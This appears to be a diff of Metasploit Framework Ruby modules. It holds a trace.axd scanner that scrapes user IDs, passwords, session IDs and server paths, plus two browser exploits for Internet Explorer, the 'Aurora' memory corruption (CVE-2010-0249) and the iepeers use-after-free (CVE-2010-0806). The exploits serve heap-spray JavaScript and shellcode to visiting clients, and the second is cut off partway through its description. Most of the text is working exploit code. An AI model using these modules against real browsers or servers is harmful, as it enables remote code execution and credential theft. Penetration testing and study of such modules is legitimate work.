||||
|
||||
if res
|
||||
reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/
|
||||
]
|
||||
print_status ("DETAIL: #{turl}")
|
||||
reg_info.each do |reg|
|
||||
result = res.body.scan(reg).flatten.map{|s| s.strip}.uniq
|
||||
str = result.to_s.chomp
|
||||
|
||||
|
||||
if reg.to_s.include?"APPL_PHYSICAL_PATH"
|
||||
print_status ("Physical Path: #{str}")
|
||||
elsif reg.to_s.include?"UserId"
|
||||
print_status ("User ID: #{str}")
|
||||
elsif reg.to_s.include?"Password"
|
||||
print_status ("Password: #{str}")
|
||||
elsif reg.to_s.include?"AspFilterSessionId"
|
||||
print_status ("Session ID: #{str}")
|
||||
elsif reg.to_s.include?"LOCAL_ADDR"
|
||||
print_status ("Local Address: #{str}")
|
||||
elsif result.include?"Via"
|
||||
print_status ("VIA: #{str}")
|
||||
elsif reg.to_s.include?"ALL_RAW"
|
||||
print_status ("Headers: #{str}")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::WMAPScanDir
|
||||
# Scanner mixin should be near last
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'HTTP trace.axd Content Scanner',
|
||||
'Version' => '$Revision: 7605 $',
|
||||
'Description' => 'Detect trace.axd files and analize its content',
|
||||
'Author' => ['c4an'],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The test path to find trace.axd file", '/']),
|
||||
OptBool.new('TRACE_DETAILS', [ true, "Display trace.axd details", true ])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('StoreFile', [ false, "Store all information into a file", './trace_axd.log'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(target_host)
|
||||
tpath = datastore['PATH']
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
||||
begin
|
||||
turl = tpath+'trace.axd'
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => turl,
|
||||
'method' => 'GET',
|
||||
'version' => '1.0',
|
||||
}, 10)
|
||||
|
||||
|
||||
if res and res.body.include?("<td><h1>Application Trace</h1></td>")
|
||||
print_status("[#{target_host}] #{tpath}trace.axd FOUND.")
|
||||
|
||||
report_note(
|
||||
:host => target_host,
|
||||
:proto => 'HTTP',
|
||||
:port => rport,
|
||||
:type => 'TRACE_AXD',
|
||||
:data => "trace.axd"
|
||||
)
|
||||
|
||||
if datastore['TRACE_DETAILS']
|
||||
|
||||
aregex = /Trace.axd\?id=\d/
|
||||
result = res.body.scan(aregex).uniq
|
||||
|
||||
result.each do |u|
|
||||
turl = tpath+u.to_s
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => turl,
|
||||
'method' => 'GET',
|
||||
'version' => '1.0',
|
||||
}, 10)
|
||||
|
||||
if res
|
||||
reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/,
|
||||
/<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/
|
||||
]
|
||||
print_status ("DETAIL: #{turl}")
|
||||
reg_info.each do |reg|
|
||||
result = res.body.scan(reg).flatten.map{|s| s.strip}.uniq
|
||||
str = result.to_s.chomp
|
||||
|
||||
|
||||
if reg.to_s.include?"APPL_PHYSICAL_PATH"
|
||||
print_status ("Physical Path: #{str}")
|
||||
elsif reg.to_s.include?"UserId"
|
||||
print_status ("User ID: #{str}")
|
||||
elsif reg.to_s.include?"Password"
|
||||
print_status ("Password: #{str}")
|
||||
elsif reg.to_s.include?"AspFilterSessionId"
|
||||
print_status ("Session ID: #{str}")
|
||||
elsif reg.to_s.include?"LOCAL_ADDR"
|
||||
print_status ("Local Address: #{str}")
|
||||
elsif result.include?"Via"
|
||||
print_status ("VIA: #{str}")
|
||||
elsif reg.to_s.include?"ALL_RAW"
|
||||
print_status ("Headers: #{str}")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,161 +1,161 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "6.0",
|
||||
:ua_maxver => "8.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:vuln_test => nil, # no way to test without just trying it
|
||||
})
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Internet Explorer "Aurora" Memory Corruption',
|
||||
'Description' => %q{
|
||||
This module exploits a memory corruption flaw in Internet Explorer. This
|
||||
flaw was found in the wild and was a key component of the "Operation Aurora"
|
||||
attacks that lead to the compromise of a number of high profile companies. The
|
||||
exploit code is a direct port of the public sample published to the Wepawet
|
||||
malware analysis site. The technique used by this module is currently identical
|
||||
to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'unknown',
|
||||
'hdm' # Metasploit port
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "6.0",
|
||||
:ua_maxver => "8.0",
|
||||
:javascript => true,
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:vuln_test => nil, # no way to test without just trying it
|
||||
})
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Internet Explorer "Aurora" Memory Corruption',
|
||||
'Description' => %q{
|
||||
This module exploits a memory corruption flaw in Internet Explorer. This
|
||||
flaw was found in the wild and was a key component of the "Operation Aurora"
|
||||
attacks that lead to the compromise of a number of high profile companies. The
|
||||
exploit code is a direct port of the public sample published to the Wepawet
|
||||
malware analysis site. The technique used by this module is currently identical
|
||||
to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
['MSB', 'MS10-002'],
|
||||
['CVE', '2010-0249'],
|
||||
['OSVDB', '61697'],
|
||||
['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
|
||||
['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
|
||||
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => '-find',
|
||||
},
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { }],
|
||||
],
|
||||
'DisclosureDate' => 'Jan 14 2009', # wepawet sample
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
if (request.uri.match(/\.gif/i))
|
||||
data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
|
||||
send_response(cli, data, { 'Content-Type' => 'image/gif' })
|
||||
return
|
||||
end
|
||||
|
||||
var_boom = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_element = rand_text_alpha(rand(100) + 1)
|
||||
var_event = rand_text_alpha(rand(100) + 1)
|
||||
var_loaded = rand_text_alpha(rand(100) + 1)
|
||||
var_loaded_arg = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_memory = rand_text_alpha(rand(100) + 1)
|
||||
var_spray = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_el_array = rand_text_alpha(rand(100) + 1)
|
||||
bleh = rand_text_alpha(3);
|
||||
var_grab_mem = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_unescape = rand_text_alpha(rand(100) + 1)
|
||||
var_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_span_id = rand_text_alpha(rand(100) + 1)
|
||||
var_start = rand_text_alpha(rand(100) + 1)
|
||||
rand_html = rand_text_english(rand(400) + 500)
|
||||
|
||||
html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
|
||||
<html>
|
||||
<head>
|
||||
<script>
|
||||
var #{var_element} = "COMMENT";
|
||||
var #{var_el_array} = new Array();
|
||||
for (i = 0; i < 1300; i++)
|
||||
{
|
||||
#{var_el_array}[i] = document.createElement(#{var_element});
|
||||
#{var_el_array}[i].data = "#{bleh}";
|
||||
}
|
||||
var #{var_event} = null;
|
||||
var #{var_memory} = new Array();
|
||||
var #{var_unescape} = unescape;
|
||||
function #{var_boom}()
|
||||
{
|
||||
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
|
||||
var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
|
||||
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
|
||||
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
|
||||
}
|
||||
function #{var_loaded}(#{var_loaded_arg})
|
||||
{
|
||||
#{var_boom}();
|
||||
#{var_event} = document.createEventObject(#{var_loaded_arg});
|
||||
document.getElementById("#{var_span_id}").innerHTML = "";
|
||||
window.setInterval(#{var_grab_mem}, 50);
|
||||
}
|
||||
function #{var_grab_mem}()
|
||||
{
|
||||
p = "\\u0c0f\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
|
||||
for (i = 0; i < #{var_el_array}.length; i++)
|
||||
{
|
||||
#{var_el_array}[i].data = p;
|
||||
}
|
||||
var t = #{var_event}.srcElement;
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body>
|
||||
<span id="#{var_span_id}"><iframe src="#{get_resource}#{var_start}.gif" onload="#{var_loaded}(event)" /></span></body></html>
|
||||
</body>
|
||||
</html>|
|
||||
|
||||
print_status("Sending #{self.name} to client #{cli.peerhost}")
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
'unknown',
|
||||
'hdm' # Metasploit port
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['MSB', 'MS10-002'],
|
||||
['CVE', '2010-0249'],
|
||||
['OSVDB', '61697'],
|
||||
['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
|
||||
['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
|
||||
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => '-find',
|
||||
},
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { }],
|
||||
],
|
||||
'DisclosureDate' => 'Jan 14 2009', # wepawet sample
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
if (request.uri.match(/\.gif/i))
|
||||
data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
|
||||
send_response(cli, data, { 'Content-Type' => 'image/gif' })
|
||||
return
|
||||
end
|
||||
|
||||
var_boom = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_element = rand_text_alpha(rand(100) + 1)
|
||||
var_event = rand_text_alpha(rand(100) + 1)
|
||||
var_loaded = rand_text_alpha(rand(100) + 1)
|
||||
var_loaded_arg = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_memory = rand_text_alpha(rand(100) + 1)
|
||||
var_spray = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_el_array = rand_text_alpha(rand(100) + 1)
|
||||
bleh = rand_text_alpha(3);
|
||||
var_grab_mem = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_unescape = rand_text_alpha(rand(100) + 1)
|
||||
var_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_span_id = rand_text_alpha(rand(100) + 1)
|
||||
var_start = rand_text_alpha(rand(100) + 1)
|
||||
rand_html = rand_text_english(rand(400) + 500)
|
||||
|
||||
html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
|
||||
<html>
|
||||
<head>
|
||||
<script>
|
||||
var #{var_element} = "COMMENT";
|
||||
var #{var_el_array} = new Array();
|
||||
for (i = 0; i < 1300; i++)
|
||||
{
|
||||
#{var_el_array}[i] = document.createElement(#{var_element});
|
||||
#{var_el_array}[i].data = "#{bleh}";
|
||||
}
|
||||
var #{var_event} = null;
|
||||
var #{var_memory} = new Array();
|
||||
var #{var_unescape} = unescape;
|
||||
function #{var_boom}()
|
||||
{
|
||||
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
|
||||
var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
|
||||
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
|
||||
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
|
||||
}
|
||||
function #{var_loaded}(#{var_loaded_arg})
|
||||
{
|
||||
#{var_boom}();
|
||||
#{var_event} = document.createEventObject(#{var_loaded_arg});
|
||||
document.getElementById("#{var_span_id}").innerHTML = "";
|
||||
window.setInterval(#{var_grab_mem}, 50);
|
||||
}
|
||||
function #{var_grab_mem}()
|
||||
{
|
||||
p = "\\u0c0f\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
|
||||
for (i = 0; i < #{var_el_array}.length; i++)
|
||||
{
|
||||
#{var_el_array}[i].data = p;
|
||||
}
|
||||
var t = #{var_event}.srcElement;
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body>
|
||||
<span id="#{var_span_id}"><iframe src="#{get_resource}#{var_start}.gif" onload="#{var_loaded}(event)" /></span></body></html>
|
||||
</body>
|
||||
</html>|
|
||||
|
||||
print_status("Sending #{self.name} to client #{cli.peerhost}")
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -1,252 +1,252 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
##
|
||||
# originally ie_iepeers_pointer.rb
|
||||
#
|
||||
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
|
||||
#
|
||||
# Tested successfully on the following platforms:
|
||||
# - Microsoft Internet Explorer 7, Windows Vista SP2
|
||||
# - Microsoft Internet Explorer 7, Windows XP SP3
|
||||
# - Microsoft Internet Explorer 6, Windows XP SP3
|
||||
#
|
||||
# Exploit found in-the-wild. For additional details:
|
||||
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
|
||||
#
|
||||
# Trancer
|
||||
# http://www.rec-sec.com
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Internet Explorer DHTML Behaviors Use After Free',
|
||||
'Description' => %q{
|
||||
This module exploits a use-after-free vulnerability within the DHTML behaviors
|
||||
functionality of Microsoft Internet Explorer versions 6 and 7. This bug was
|
||||
discovered being used in-the-wild and was previously known as the "iepeers"
|
||||
vulnerability. The name comes from Microsoft's suggested workaround to block
|
||||
access to the iepeers.dll file.
|
||||
|
||||
According to Nico Waisman, "The bug itself is when trying to persist an object
|
||||
using the setAttribute, which end up calling VariantChangeTypeEx with both the
|
||||
source and the destination being the same variant. So if you send as a variant
|
||||
an IDISPATCH the algorithm will try to do a VariantClear of the destination before
|
||||
using it. This will end up on a call to PlainRelease which deref the reference
|
||||
and clean the object."
|
||||
|
||||
NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'unknown', # original discovery
|
||||
'Trancer <mtrancer[at]gmail.com>', # metasploit module
|
||||
'Nanika', # HIT2010 IE7 reliable PoC
|
||||
'jduck' # minor cleanups
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0806' ],
|
||||
[ 'OSVDB', '62810' ],
|
||||
[ 'BID', '38615' ],
|
||||
[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
|
||||
[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ],
|
||||
[ 'URL', 'http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html' ],
|
||||
[ 'MSB', 'MS10-018' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'migrate -f',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00\x09\x0a\x0d'\\",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
|
||||
{
|
||||
'Method' => 'automatic'
|
||||
}
|
||||
],
|
||||
|
||||
[ 'IE 6 SP0-SP2 (onclick)',
|
||||
{
|
||||
'Method' => 'onclick',
|
||||
'Ret' => 0x0C0C0C0C
|
||||
}
|
||||
],
|
||||
|
||||
# "A great celebration of HIT2010" - http://www.hitcon.org/
|
||||
[ 'IE 7.0 (marquee)',
|
||||
{
|
||||
'Method' => 'marquee',
|
||||
'Ret' => 0x0C0C0C0C
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 09 2010',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
|
||||
def auto_target(cli, request)
|
||||
mytarget = nil
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
#print_status("Checking user agent: #{agent}")
|
||||
if agent =~ /Windows NT 6\.0/
|
||||
mytarget = targets[2] # IE7 on Vista
|
||||
elsif agent =~ /MSIE 7\.0/
|
||||
mytarget = targets[2] # IE7 on XP and 2003
|
||||
elsif agent =~ /MSIE 6\.0/
|
||||
mytarget = targets[1] # IE6 on NT, 2000, XP and 2003
|
||||
else
|
||||
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
|
||||
end
|
||||
|
||||
mytarget
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
if target['Method'] == 'automatic'
|
||||
mytarget = auto_target(cli, request)
|
||||
if (not mytarget)
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
else
|
||||
mytarget = target
|
||||
end
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
|
||||
# Encode the shellcode
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
|
||||
|
||||
# Set the return\nops
|
||||
ret = Rex::Text.to_unescape([mytarget.ret].pack('V'))
|
||||
|
||||
# Randomize the javascript variable names
|
||||
j_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
j_nops = rand_text_alpha(rand(100) + 1)
|
||||
j_slackspace = rand_text_alpha(rand(100) + 1)
|
||||
j_fillblock = rand_text_alpha(rand(100) + 1)
|
||||
j_memory = rand_text_alpha(rand(100) + 1)
|
||||
j_counter = rand_text_alpha(rand(30) + 2)
|
||||
j_ret = rand_text_alpha(rand(100) + 1)
|
||||
j_array = rand_text_alpha(rand(100) + 1)
|
||||
j_function1 = rand_text_alpha(rand(100) + 1)
|
||||
j_function2 = rand_text_alpha(rand(100) + 1)
|
||||
j_object = rand_text_alpha(rand(100) + 1)
|
||||
j_id = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
# Construct the final page
|
||||
case mytarget['Method']
|
||||
|
||||
when 'onclick'
|
||||
html = %Q|<html><body>
|
||||
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
|
||||
<script language='javascript'>
|
||||
function #{j_function1}(){
|
||||
var #{j_shellcode} = unescape('#{shellcode}');
|
||||
#{j_memory} = new Array();
|
||||
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
|
||||
var #{j_nops} = unescape('#{ret}');
|
||||
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
|
||||
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
|
||||
delete #{j_nops};
|
||||
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
|
||||
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
|
||||
}
|
||||
}
|
||||
function #{j_function2}(){
|
||||
#{j_function1}();
|
||||
var #{j_object} = document.createElement('body');
|
||||
#{j_object}.addBehavior('#default#userData');
|
||||
document.appendChild(#{j_object});
|
||||
try {
|
||||
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
|
||||
#{j_object}.setAttribute('s',window);
|
||||
}
|
||||
} catch(e){ }
|
||||
window.status+='';
|
||||
}
|
||||
|
||||
document.getElementById('#{j_id}').onclick();
|
||||
</script></body></html>
|
||||
|
|
||||
|
||||
when 'marquee'
|
||||
j_attrib = rand_text_alpha(6);
|
||||
html = %Q|<html>
|
||||
<head>
|
||||
<style type="text/css">
|
||||
.#{j_object} {behavior: url(#default#userData);}
|
||||
</style>
|
||||
</head>
|
||||
<script>
|
||||
function #{j_function1}(){
|
||||
var #{j_shellcode} = unescape('#{shellcode}');
|
||||
#{j_memory} = new Array();
|
||||
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
|
||||
var #{j_nops} = unescape('#{ret}');
|
||||
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
|
||||
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
|
||||
delete #{j_nops};
|
||||
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
|
||||
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
|
||||
}
|
||||
}
|
||||
function #{j_function2}() {
|
||||
#{j_function1}();
|
||||
for (#{j_counter} = 1; #{j_counter} <10; #{j_counter} ++ ){
|
||||
#{j_id}.setAttribute("#{j_attrib}",document.location);
|
||||
}
|
||||
#{j_id}.setAttribute("#{j_attrib}",document.getElementsByName("style"));
|
||||
document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank";
|
||||
}
|
||||
</script>
|
||||
<body onload="#{j_function2}();"></body>
|
||||
<MARQUEE id="#{j_id}" class="#{j_object}"></MARQUEE>
|
||||
</html>
|
||||
|
|
||||
|
||||
end
|
||||
|
||||
# Transmit the compressed response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
|
||||
end
|
||||
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
##
|
||||
# originally ie_iepeers_pointer.rb
|
||||
#
|
||||
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
|
||||
#
|
||||
# Tested successfully on the following platforms:
|
||||
# - Microsoft Internet Explorer 7, Windows Vista SP2
|
||||
# - Microsoft Internet Explorer 7, Windows XP SP3
|
||||
# - Microsoft Internet Explorer 6, Windows XP SP3
|
||||
#
|
||||
# Exploit found in-the-wild. For additional details:
|
||||
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
|
||||
#
|
||||
# Trancer
|
||||
# http://www.rec-sec.com
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Internet Explorer DHTML Behaviors Use After Free',
|
||||
'Description' => %q{
|
||||
This module exploits a use-after-free vulnerability within the DHTML behaviors
|
||||
functionality of Microsoft Internet Explorer versions 6 and 7. This bug was
|
||||
discovered being used in-the-wild and was previously known as the "iepeers"
|
